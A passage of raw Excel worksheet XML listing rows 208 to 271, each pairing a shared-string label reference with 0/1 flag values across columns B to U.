      <c r="D208" s="9">
        <v>0</v>
      </c>
      <c r="E208" s="9">
        <v>0</v>
      </c>
      <c r="F208" s="9">
        <v>1</v>
      </c>
      <c r="G208" s="9">
        <v>0</v>
      </c>
      <c r="H208" s="9">
        <v>1</v>
      </c>
      <c r="I208" s="9">
        <v>0</v>
      </c>
      <c r="J208" s="9">
        <v>0</v>
      </c>
      <c r="K208" s="9">
        <v>0</v>
      </c>
      <c r="L208" s="9">
        <v>0</v>
      </c>
      <c r="M208" s="1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7">
        <v>0</v>
      </c>
      <c r="U208" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="209" spans="1:21">
      <c r="A209" s="7" t="s">
        <v>212</v>
      </c>
      <c r="B209" s="1">
        <v>1</v>
      </c>
      <c r="C209" s="12">
        <v>0</v>
      </c>
      <c r="D209" s="9">
        <v>0</v>
      </c>
      <c r="E209" s="9">
        <v>0</v>
      </c>
      <c r="F209" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U209" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="210" spans="1:21" ht="24">
      <c r="A210" s="7" t="s">
        <v>213</v>
      </c>
      <c r="B210" s="1">
        <v>1</v>
      </c>
      <c r="C210" s="12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1">
        <v>0</v>
      </c>
      <c r="N210" s="12">
        <v>0</v>
      </c>
      <c r="O210" s="12">
        <v>0</v>
      </c>
      <c r="P210" s="12">
        <v>0</v>
      </c>
      <c r="Q210" s="12">
        <v>1</v>
      </c>
      <c r="R210" s="12">
        <v>0</v>
      </c>
      <c r="S210" s="12">
        <v>0</v>
      </c>
      <c r="T210" s="17">
        <v>0</v>
      </c>
      <c r="U210" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="211" spans="1:21" ht="24">
      <c r="A211" s="7" t="s">
        <v>214</v>
      </c>
      <c r="B211" s="1">
        <v>1</v>
      </c>
      <c r="C211" s="12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1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7">
        <v>1</v>
      </c>
      <c r="U211" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="212" spans="1:21" ht="24">
      <c r="A212" s="7" t="s">
        <v>215</v>
      </c>
      <c r="B212" s="1">
        <v>1</v>
      </c>
      <c r="C212" s="12">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U212" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="213" spans="1:21" ht="24">
      <c r="A213" s="7" t="s">
        <v>216</v>
      </c>
      <c r="B213" s="1">
        <v>1</v>
      </c>
      <c r="C213" s="12">
        <v>0</v>
      </c>
      <c r="D213" s="9">
        <v>0</v>
      </c>
      <c r="E213" s="9">
        <v>1</v>
      </c>
      <c r="F213" s="9">
        <v>0</v>
      </c>
      <c r="G213" s="9">
        <v>0</v>
      </c>
      <c r="H213" s="9">
        <v>1</v>
      </c>
      <c r="I213" s="9">
        <v>0</v>
      </c>
      <c r="J213" s="9">
        <v>0</v>
      </c>
      <c r="K213" s="9">
        <v>0</v>
      </c>
      <c r="L213" s="9">
        <v>0</v>
      </c>
      <c r="M213" s="1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7">
        <v>0</v>
      </c>
      <c r="U213" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="214" spans="1:21">
      <c r="A214" s="7" t="s">
        <v>217</v>
      </c>
      <c r="B214" s="1">
        <v>1</v>
      </c>
      <c r="C214" s="12">
        <v>0</v>
      </c>
      <c r="D214" s="9">
        <v>0</v>
      </c>
      <c r="E214" s="9">
        <v>0</v>
      </c>
      <c r="F214" s="9">
        <v>1</v>
      </c>
      <c r="G214" s="9">
        <v>0</v>
      </c>
      <c r="H214" s="9">
        <v>1</v>
      </c>
      <c r="I214" s="9">
        <v>0</v>
      </c>
      <c r="J214" s="9">
        <v>0</v>
      </c>
      <c r="K214" s="9">
        <v>0</v>
      </c>
      <c r="L214" s="9">
        <v>0</v>
      </c>
      <c r="M214" s="1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7">
        <v>0</v>
      </c>
      <c r="U214" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="215" spans="1:21">
      <c r="A215" s="7" t="s">
        <v>218</v>
      </c>
      <c r="B215" s="1">
        <v>1</v>
      </c>
      <c r="C215" s="12">
        <v>0</v>
      </c>
      <c r="D215" s="9">
        <v>0</v>
      </c>
      <c r="E215" s="9">
        <v>0</v>
      </c>
      <c r="F215" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U215" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="216" spans="1:21">
      <c r="A216" s="7" t="s">
        <v>219</v>
      </c>
      <c r="B216" s="1">
        <v>1</v>
      </c>
      <c r="C216" s="12">
        <v>0</v>
      </c>
      <c r="D216" s="9">
        <v>0</v>
      </c>
      <c r="E216" s="9">
        <v>0</v>
      </c>
      <c r="F216" s="9">
        <v>0</v>
      </c>
      <c r="G216" s="9">
        <v>0</v>
      </c>
      <c r="H216" s="9">
        <v>1</v>
      </c>
      <c r="I216" s="9">
        <v>0</v>
      </c>
      <c r="J216" s="9">
        <v>0</v>
      </c>
      <c r="K216" s="9">
        <v>0</v>
      </c>
      <c r="L216" s="9">
        <v>0</v>
      </c>
      <c r="M216" s="1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7">
        <v>0</v>
      </c>
      <c r="U216" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="217" spans="1:21">
      <c r="A217" s="7" t="s">
        <v>220</v>
      </c>
      <c r="B217" s="1">
        <v>0</v>
      </c>
      <c r="C217" s="12">
        <v>0</v>
      </c>
      <c r="D217" s="9">
        <v>0</v>
      </c>
      <c r="E217" s="9">
        <v>0</v>
      </c>
      <c r="F217" s="9">
        <v>1</v>
      </c>
      <c r="G217" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U217" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="218" spans="1:21" ht="24">
      <c r="A218" s="7" t="s">
        <v>221</v>
      </c>
      <c r="B218" s="1">
        <v>0</v>
      </c>
      <c r="C218" s="12">
        <v>0</v>
      </c>
      <c r="D218" s="9">
        <v>0</v>
      </c>
      <c r="E218" s="9">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U218" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="219" spans="1:21" ht="48">
      <c r="A219" s="7" t="s">
        <v>222</v>
      </c>
      <c r="B219" s="1">
        <v>1</v>
      </c>
      <c r="C219" s="12">
        <v>1</v>
      </c>
      <c r="D219" s="9">
        <v>0</v>
      </c>
      <c r="E219" s="9">
        <v>1</v>
      </c>
      <c r="F219" s="9">
        <v>0</v>
      </c>
      <c r="G219" s="9">
        <v>0</v>
      </c>
      <c r="H219" s="9">
        <v>1</v>
      </c>
      <c r="I219" s="9">
        <v>0</v>
      </c>
      <c r="J219" s="9">
        <v>0</v>
      </c>
      <c r="K219" s="9">
        <v>0</v>
      </c>
      <c r="L219" s="9">
        <v>0</v>
      </c>
      <c r="M219" s="1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7">
        <v>0</v>
      </c>
      <c r="U219" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="220" spans="1:21" ht="24">
      <c r="A220" s="7" t="s">
        <v>223</v>
      </c>
      <c r="B220" s="1">
        <v>1</v>
      </c>
      <c r="C220" s="12">
        <v>1</v>
      </c>
      <c r="D220" s="9">
        <v>0</v>
      </c>
      <c r="E220" s="9">
        <v>1</v>
      </c>
      <c r="F220" s="9">
        <v>0</v>
      </c>
      <c r="G220" s="9">
        <v>0</v>
      </c>
      <c r="H220" s="9">
        <v>1</v>
      </c>
      <c r="I220" s="9">
        <v>0</v>
      </c>
      <c r="J220" s="9">
        <v>0</v>
      </c>
      <c r="K220" s="9">
        <v>0</v>
      </c>
      <c r="L220" s="9">
        <v>0</v>
      </c>
      <c r="M220" s="1">
        <v>0</v>
      </c>
      <c r="N220" s="12">
        <v>0</v>
      </c>
      <c r="O220" s="12">
        <v>0</v>
      </c>
      <c r="P220" s="12">
        <v>0</v>
      </c>
      <c r="Q220" s="12">
        <v>1</v>
      </c>
      <c r="R220" s="12">
        <v>0</v>
      </c>
      <c r="S220" s="12">
        <v>0</v>
      </c>
      <c r="T220" s="17">
        <v>0</v>
      </c>
      <c r="U220" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="221" spans="1:21">
      <c r="A221" s="7" t="s">
        <v>224</v>
      </c>
      <c r="B221" s="1">
        <v>1</v>
      </c>
      <c r="C221" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U221" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="222" spans="1:21">
      <c r="A222" s="7" t="s">
        <v>225</v>
      </c>
      <c r="B222" s="1">
        <v>1</v>
      </c>
      <c r="C222" s="12">
        <v>0</v>
      </c>
      <c r="D222" s="9">
        <v>0</v>
      </c>
      <c r="E222" s="9">
        <v>0</v>
      </c>
      <c r="F222" s="9">
        <v>1</v>
      </c>
      <c r="G222" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U222" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="223" spans="1:21" ht="36">
      <c r="A223" s="7" t="s">
        <v>226</v>
      </c>
      <c r="B223" s="1">
        <v>1</v>
      </c>
      <c r="C223" s="12">
        <v>1</v>
      </c>
      <c r="D223" s="9">
        <v>0</v>
      </c>
      <c r="E223" s="9">
        <v>1</v>
      </c>
      <c r="F223" s="9">
        <v>0</v>
      </c>
      <c r="G223" s="9">
        <v>0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1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1</v>
      </c>
      <c r="T223" s="17">
        <v>0</v>
      </c>
      <c r="U223" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="224" spans="1:21" ht="24">
      <c r="A224" s="7" t="s">
        <v>227</v>
      </c>
      <c r="B224" s="1">
        <v>1</v>
      </c>
      <c r="C224" s="12">
        <v>1</v>
      </c>
      <c r="D224" s="9">
        <v>0</v>
      </c>
      <c r="E224" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N224" s="12">
        <v>0</v>
      </c>
      <c r="O224" s="12">
        <v>1</v>
      </c>
      <c r="P224" s="12">
        <v>0</v>
      </c>
      <c r="Q224" s="12">
        <v>0</v>
      </c>
      <c r="R224" s="12">
        <v>0</v>
      </c>
      <c r="S224" s="12">
        <v>0</v>
      </c>
      <c r="T224" s="17">
        <v>0</v>
      </c>
      <c r="U224" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="225" spans="1:21" ht="24">
      <c r="A225" s="7" t="s">
        <v>228</v>
      </c>
      <c r="B225" s="1">
        <v>1</v>
      </c>
      <c r="C225" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U225" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="226" spans="1:21">
      <c r="A226" s="7" t="s">
        <v>229</v>
      </c>
      <c r="B226" s="1">
        <v>0</v>
      </c>
      <c r="C226" s="12">
        <v>0</v>
      </c>
      <c r="D226" s="9">
        <v>0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1</v>
      </c>
      <c r="M226" s="1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7">
        <v>0</v>
      </c>
      <c r="U226" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="227" spans="1:21">
      <c r="A227" s="7" t="s">
        <v>230</v>
      </c>
      <c r="B227" s="1">
        <v>1</v>
      </c>
      <c r="C227" s="12">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U227" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="228" spans="1:21">
      <c r="A228" s="7" t="s">
        <v>231</v>
      </c>
      <c r="B228" s="1">
        <v>0</v>
      </c>
      <c r="C228" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U228" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="229" spans="1:21" ht="36">
      <c r="A229" s="7" t="s">
        <v>232</v>
      </c>
      <c r="B229" s="1">
        <v>1</v>
      </c>
      <c r="C229" s="12">
        <v>1</v>
      </c>
      <c r="D229" s="9">
        <v>0</v>
      </c>
      <c r="E229" s="9">
        <v>1</v>
      </c>
      <c r="F229" s="9">
        <v>0</v>
      </c>
      <c r="G229" s="9">
        <v>0</v>
      </c>
      <c r="H229" s="9">
        <v>1</v>
      </c>
      <c r="I229" s="9">
        <v>0</v>
      </c>
      <c r="J229" s="9">
        <v>0</v>
      </c>
      <c r="K229" s="9">
        <v>0</v>
      </c>
      <c r="L229" s="9">
        <v>0</v>
      </c>
      <c r="M229" s="1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1</v>
      </c>
      <c r="T229" s="17">
        <v>0</v>
      </c>
      <c r="U229" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="230" spans="1:21">
      <c r="A230" s="7" t="s">
        <v>233</v>
      </c>
      <c r="B230" s="1">
        <v>0</v>
      </c>
      <c r="C230" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U230" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="231" spans="1:21">
      <c r="A231" s="7" t="s">
        <v>234</v>
      </c>
      <c r="B231" s="1">
        <v>0</v>
      </c>
      <c r="C231" s="12">
        <v>0</v>
      </c>
      <c r="D231" s="9">
        <v>0</v>
      </c>
      <c r="E231" s="9">
        <v>1</v>
      </c>
      <c r="F231" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U231" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="232" spans="1:21" ht="24">
      <c r="A232" s="7" t="s">
        <v>235</v>
      </c>
      <c r="B232" s="1">
        <v>1</v>
      </c>
      <c r="C232" s="12">
        <v>1</v>
      </c>
      <c r="D232" s="9">
        <v>0</v>
      </c>
      <c r="E232" s="9">
        <v>1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1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1</v>
      </c>
      <c r="S232" s="12">
        <v>0</v>
      </c>
      <c r="T232" s="17">
        <v>0</v>
      </c>
      <c r="U232" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="233" spans="1:21">
      <c r="A233" s="7" t="s">
        <v>236</v>
      </c>
      <c r="B233" s="1">
        <v>1</v>
      </c>
      <c r="C233" s="12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1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7">
        <v>1</v>
      </c>
      <c r="U233" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="234" spans="1:21" ht="36">
      <c r="A234" s="7" t="s">
        <v>237</v>
      </c>
      <c r="B234" s="1">
        <v>1</v>
      </c>
      <c r="C234" s="12">
        <v>1</v>
      </c>
      <c r="D234" s="9">
        <v>0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0</v>
      </c>
      <c r="L234" s="9">
        <v>0</v>
      </c>
      <c r="M234" s="1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7">
        <v>0</v>
      </c>
      <c r="U234" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="235" spans="1:21" ht="24">
      <c r="A235" s="7" t="s">
        <v>238</v>
      </c>
      <c r="B235" s="1">
        <v>1</v>
      </c>
      <c r="C235" s="12">
        <v>0</v>
      </c>
      <c r="D235" s="9">
        <v>0</v>
      </c>
      <c r="E235" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U235" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="236" spans="1:21" ht="24">
      <c r="A236" s="7" t="s">
        <v>239</v>
      </c>
      <c r="B236" s="1">
        <v>1</v>
      </c>
      <c r="C236" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U236" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="237" spans="1:21" ht="36">
      <c r="A237" s="7" t="s">
        <v>240</v>
      </c>
      <c r="B237" s="1">
        <v>1</v>
      </c>
      <c r="C237" s="12">
        <v>0</v>
      </c>
      <c r="D237" s="9">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U237" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="238" spans="1:21">
      <c r="A238" s="7" t="s">
        <v>241</v>
      </c>
      <c r="B238" s="1">
        <v>0</v>
      </c>
      <c r="C238" s="12">
        <v>0</v>
      </c>
      <c r="D238" s="9">
        <v>0</v>
      </c>
      <c r="E238" s="9">
        <v>1</v>
      </c>
      <c r="F238" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U238" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="239" spans="1:21">
      <c r="A239" s="7" t="s">
        <v>242</v>
      </c>
      <c r="B239" s="1">
        <v>0</v>
      </c>
      <c r="C239" s="12">
        <v>0</v>
      </c>
      <c r="D239" s="9">
        <v>0</v>
      </c>
      <c r="E239" s="9">
        <v>1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1</v>
      </c>
      <c r="M239" s="1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7">
        <v>0</v>
      </c>
      <c r="U239" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="240" spans="1:21" ht="36">
      <c r="A240" s="7" t="s">
        <v>243</v>
      </c>
      <c r="B240" s="1">
        <v>1</v>
      </c>
      <c r="C240" s="12">
        <v>1</v>
      </c>
      <c r="D240" s="9">
        <v>0</v>
      </c>
      <c r="E240" s="9">
        <v>1</v>
      </c>
      <c r="F240" s="9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</v>
      </c>
      <c r="L240" s="9">
        <v>0</v>
      </c>
      <c r="M240" s="1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1</v>
      </c>
      <c r="T240" s="17">
        <v>0</v>
      </c>
      <c r="U240" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="241" spans="1:21">
      <c r="A241" s="7" t="s">
        <v>244</v>
      </c>
      <c r="B241" s="1">
        <v>0</v>
      </c>
      <c r="C241" s="12">
        <v>0</v>
      </c>
      <c r="D241" s="9">
        <v>0</v>
      </c>
      <c r="E241" s="9">
        <v>0</v>
      </c>
      <c r="F241" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U241" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="242" spans="1:21">
      <c r="A242" s="7" t="s">
        <v>245</v>
      </c>
      <c r="B242" s="1">
        <v>1</v>
      </c>
      <c r="C242" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U242" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="243" spans="1:21" ht="24">
      <c r="A243" s="7" t="s">
        <v>246</v>
      </c>
      <c r="B243" s="1">
        <v>1</v>
      </c>
      <c r="C243" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U243" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="244" spans="1:21">
      <c r="A244" s="7" t="s">
        <v>247</v>
      </c>
      <c r="B244" s="1">
        <v>1</v>
      </c>
      <c r="C244" s="12">
        <v>1</v>
      </c>
      <c r="D244" s="9">
        <v>0</v>
      </c>
      <c r="E244" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U244" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="245" spans="1:21">
      <c r="A245" s="7" t="s">
        <v>248</v>
      </c>
      <c r="B245" s="1">
        <v>0</v>
      </c>
      <c r="C245" s="12">
        <v>0</v>
      </c>
      <c r="D245" s="9">
        <v>0</v>
      </c>
      <c r="E245" s="9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1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7">
        <v>0</v>
      </c>
      <c r="U245" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="246" spans="1:21" ht="24">
      <c r="A246" s="7" t="s">
        <v>249</v>
      </c>
      <c r="B246" s="1">
        <v>1</v>
      </c>
      <c r="C246" s="12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1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7">
        <v>1</v>
      </c>
      <c r="U246" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="247" spans="1:21" ht="24">
      <c r="A247" s="7" t="s">
        <v>250</v>
      </c>
      <c r="B247" s="1">
        <v>1</v>
      </c>
      <c r="C247" s="12">
        <v>1</v>
      </c>
      <c r="D247" s="9">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U247" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="248" spans="1:21">
      <c r="A248" s="7" t="s">
        <v>251</v>
      </c>
      <c r="B248" s="1">
        <v>1</v>
      </c>
      <c r="C248" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U248" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="249" spans="1:21" ht="72">
      <c r="A249" s="7" t="s">
        <v>252</v>
      </c>
      <c r="B249" s="1">
        <v>0</v>
      </c>
      <c r="C249" s="12">
        <v>1</v>
      </c>
      <c r="D249" s="9">
        <v>0</v>
      </c>
      <c r="E249" s="9">
        <v>1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1</v>
      </c>
      <c r="M249" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U249" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="250" spans="1:21">
      <c r="A250" s="7" t="s">
        <v>253</v>
      </c>
      <c r="B250" s="1">
        <v>0</v>
      </c>
      <c r="C250" s="12">
        <v>0</v>
      </c>
      <c r="D250" s="9">
        <v>0</v>
      </c>
      <c r="E250" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U250" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="251" spans="1:21" ht="24">
      <c r="A251" s="7" t="s">
        <v>254</v>
      </c>
      <c r="B251" s="1">
        <v>1</v>
      </c>
      <c r="C251" s="12">
        <v>1</v>
      </c>
      <c r="D251" s="9">
        <v>0</v>
      </c>
      <c r="E251" s="9">
        <v>1</v>
      </c>
      <c r="F251" s="9">
        <v>0</v>
      </c>
      <c r="G251" s="9">
        <v>0</v>
      </c>
      <c r="H251" s="9">
        <v>1</v>
      </c>
      <c r="I251" s="9">
        <v>0</v>
      </c>
      <c r="J251" s="9">
        <v>0</v>
      </c>
      <c r="K251" s="9">
        <v>0</v>
      </c>
      <c r="L251" s="9">
        <v>0</v>
      </c>
      <c r="M251" s="1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7">
        <v>0</v>
      </c>
      <c r="U251" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="252" spans="1:21">
      <c r="A252" s="7" t="s">
        <v>255</v>
      </c>
      <c r="B252" s="1">
        <v>1</v>
      </c>
      <c r="C252" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U252" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="253" spans="1:21" ht="24">
      <c r="A253" s="7" t="s">
        <v>256</v>
      </c>
      <c r="B253" s="1">
        <v>1</v>
      </c>
      <c r="C253" s="12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1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7">
        <v>1</v>
      </c>
      <c r="U253" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="254" spans="1:21" ht="36">
      <c r="A254" s="7" t="s">
        <v>257</v>
      </c>
      <c r="B254" s="1">
        <v>0</v>
      </c>
      <c r="C254" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U254" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="255" spans="1:21" ht="24">
      <c r="A255" s="7" t="s">
        <v>258</v>
      </c>
      <c r="B255" s="1">
        <v>1</v>
      </c>
      <c r="C255" s="12">
        <v>1</v>
      </c>
      <c r="D255" s="9">
        <v>0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1">
        <v>0</v>
      </c>
      <c r="N255" s="12">
        <v>0</v>
      </c>
      <c r="O255" s="12">
        <v>0</v>
      </c>
      <c r="P255" s="12">
        <v>0</v>
      </c>
      <c r="Q255" s="12">
        <v>1</v>
      </c>
      <c r="R255" s="12">
        <v>0</v>
      </c>
      <c r="S255" s="12">
        <v>0</v>
      </c>
      <c r="T255" s="17">
        <v>0</v>
      </c>
      <c r="U255" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="256" spans="1:21" ht="24">
      <c r="A256" s="7" t="s">
        <v>259</v>
      </c>
      <c r="B256" s="1">
        <v>1</v>
      </c>
      <c r="C256" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U256" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="257" spans="1:21" ht="24">
      <c r="A257" s="7" t="s">
        <v>260</v>
      </c>
      <c r="B257" s="1">
        <v>1</v>
      </c>
      <c r="C257" s="12">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U257" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="258" spans="1:21" ht="24">
      <c r="A258" s="7" t="s">
        <v>261</v>
      </c>
      <c r="B258" s="1">
        <v>1</v>
      </c>
      <c r="C258" s="12">
        <v>0</v>
      </c>
      <c r="D258" s="9">
        <v>0</v>
      </c>
      <c r="E258" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U258" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="259" spans="1:21">
      <c r="A259" s="7" t="s">
        <v>262</v>
      </c>
      <c r="B259" s="1">
        <v>0</v>
      </c>
      <c r="C259" s="12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9">
        <v>0</v>
      </c>
      <c r="M259" s="1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7">
        <v>0</v>
      </c>
      <c r="U259" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="260" spans="1:21">
      <c r="A260" s="7" t="s">
        <v>263</v>
      </c>
      <c r="B260" s="1">
        <v>1</v>
      </c>
      <c r="C260" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U260" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="261" spans="1:21">
      <c r="A261" s="7" t="s">
        <v>264</v>
      </c>
      <c r="B261" s="1">
        <v>0</v>
      </c>
      <c r="C261" s="12">
        <v>1</v>
      </c>
      <c r="D261" s="9">
        <v>0</v>
      </c>
      <c r="E261" s="9">
        <v>1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1</v>
      </c>
      <c r="M261" s="1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7">
        <v>0</v>
      </c>
      <c r="U261" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="262" spans="1:21">
      <c r="A262" s="7" t="s">
        <v>265</v>
      </c>
      <c r="B262" s="1">
        <v>1</v>
      </c>
      <c r="C262" s="12">
        <v>0</v>
      </c>
      <c r="D262" s="9">
        <v>0</v>
      </c>
      <c r="E262" s="9">
        <v>0</v>
      </c>
      <c r="F262" s="9">
        <v>0</v>
      </c>
      <c r="G262" s="9">
        <v>0</v>
      </c>
      <c r="H262" s="9">
        <v>1</v>
      </c>
      <c r="I262" s="9">
        <v>0</v>
      </c>
      <c r="J262" s="9">
        <v>0</v>
      </c>
      <c r="K262" s="9">
        <v>0</v>
      </c>
      <c r="L262" s="9">
        <v>0</v>
      </c>
      <c r="M262" s="1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7">
        <v>0</v>
      </c>
      <c r="U262" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="263" spans="1:21" ht="24">
      <c r="A263" s="7" t="s">
        <v>266</v>
      </c>
      <c r="B263" s="1">
        <v>0</v>
      </c>
      <c r="C263" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U263" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="264" spans="1:21">
      <c r="A264" s="7" t="s">
        <v>267</v>
      </c>
      <c r="B264" s="1">
        <v>0</v>
      </c>
      <c r="C264" s="12">
        <v>0</v>
      </c>
      <c r="D264" s="9">
        <v>0</v>
      </c>
      <c r="E264" s="9">
        <v>1</v>
      </c>
      <c r="F264" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U264" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="265" spans="1:21">
      <c r="A265" s="7" t="s">
        <v>268</v>
      </c>
      <c r="B265" s="1">
        <v>0</v>
      </c>
      <c r="C265" s="12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1</v>
      </c>
      <c r="M265" s="1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7">
        <v>0</v>
      </c>
      <c r="U265" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="266" spans="1:21" ht="24">
      <c r="A266" s="7" t="s">
        <v>269</v>
      </c>
      <c r="B266" s="1">
        <v>1</v>
      </c>
      <c r="C266" s="12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1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7">
        <v>1</v>
      </c>
      <c r="U266" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="267" spans="1:21" ht="24">
      <c r="A267" s="7" t="s">
        <v>270</v>
      </c>
      <c r="B267" s="1">
        <v>1</v>
      </c>
      <c r="C267" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U267" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="268" spans="1:21">
      <c r="A268" s="7" t="s">
        <v>271</v>
      </c>
      <c r="B268" s="1">
        <v>0</v>
      </c>
      <c r="C268" s="12">
        <v>0</v>
      </c>
      <c r="D268" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U268" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="269" spans="1:21" ht="36">
      <c r="A269" s="7" t="s">
        <v>272</v>
      </c>
      <c r="B269" s="1">
        <v>1</v>
      </c>
      <c r="C269" s="12">
        <v>1</v>
      </c>
      <c r="D269" s="9">
        <v>0</v>
      </c>
      <c r="E269" s="9">
        <v>1</v>
      </c>
      <c r="F269" s="9">
        <v>0</v>
      </c>
      <c r="G269" s="9">
        <v>0</v>
      </c>
      <c r="H269" s="9">
        <v>1</v>
      </c>
      <c r="I269" s="9">
        <v>0</v>
      </c>
      <c r="J269" s="9">
        <v>0</v>
      </c>
      <c r="K269" s="9">
        <v>0</v>
      </c>
      <c r="L269" s="9">
        <v>0</v>
      </c>
      <c r="M269" s="1">
        <v>0</v>
      </c>
      <c r="N269" s="12">
        <v>0</v>
      </c>
      <c r="O269" s="12">
        <v>0</v>
      </c>
      <c r="P269" s="12">
        <v>0</v>
      </c>
      <c r="Q269" s="12">
        <v>1</v>
      </c>
      <c r="R269" s="12">
        <v>0</v>
      </c>
      <c r="S269" s="12">
        <v>0</v>
      </c>
      <c r="T269" s="17">
        <v>0</v>
      </c>
      <c r="U269" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="270" spans="1:21" ht="36">
      <c r="A270" s="7" t="s">
        <v>273</v>
      </c>
      <c r="B270" s="1">
        <v>1</v>
      </c>
      <c r="C270" s="12">
        <v>1</v>
      </c>
      <c r="D270" s="9">
        <v>0</v>
      </c>
      <c r="E270" s="9">
        <v>0</v>
      </c>
      <c r="F270" s="9">
        <v>1</v>
      </c>
      <c r="G270" s="9">
        <v>0</v>
      </c>
      <c r="H270" s="9">
        <v>1</v>
      </c>
      <c r="I270" s="9">
        <v>0</v>
      </c>
      <c r="J270" s="9">
        <v>0</v>
      </c>
      <c r="K270" s="9">
        <v>0</v>
      </c>
      <c r="L270" s="9">
        <v>0</v>
      </c>
      <c r="M270" s="1">
        <v>0</v>
      </c>
      <c r="N270" s="12">
        <v>0</v>
      </c>
      <c r="O270" s="12">
        <v>0</v>
      </c>
      <c r="P270" s="12">
        <v>0</v>
      </c>
      <c r="Q270" s="12">
        <v>1</v>
      </c>
      <c r="R270" s="12">
        <v>0</v>
      </c>
      <c r="S270" s="12">
        <v>0</v>
      </c>
      <c r="T270" s="17">
        <v>0</v>
      </c>
      <c r="U270" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="271" spans="1:21">
      <c r="A271" s="7" t="s">
        <v>274</v>
      </c>
      <c r="B271" s="1">
        <v>0</v>
      </c>
      <c r="C271" s="12">
        <v>0</v>
      </c>
      <c r="D271" s="9">
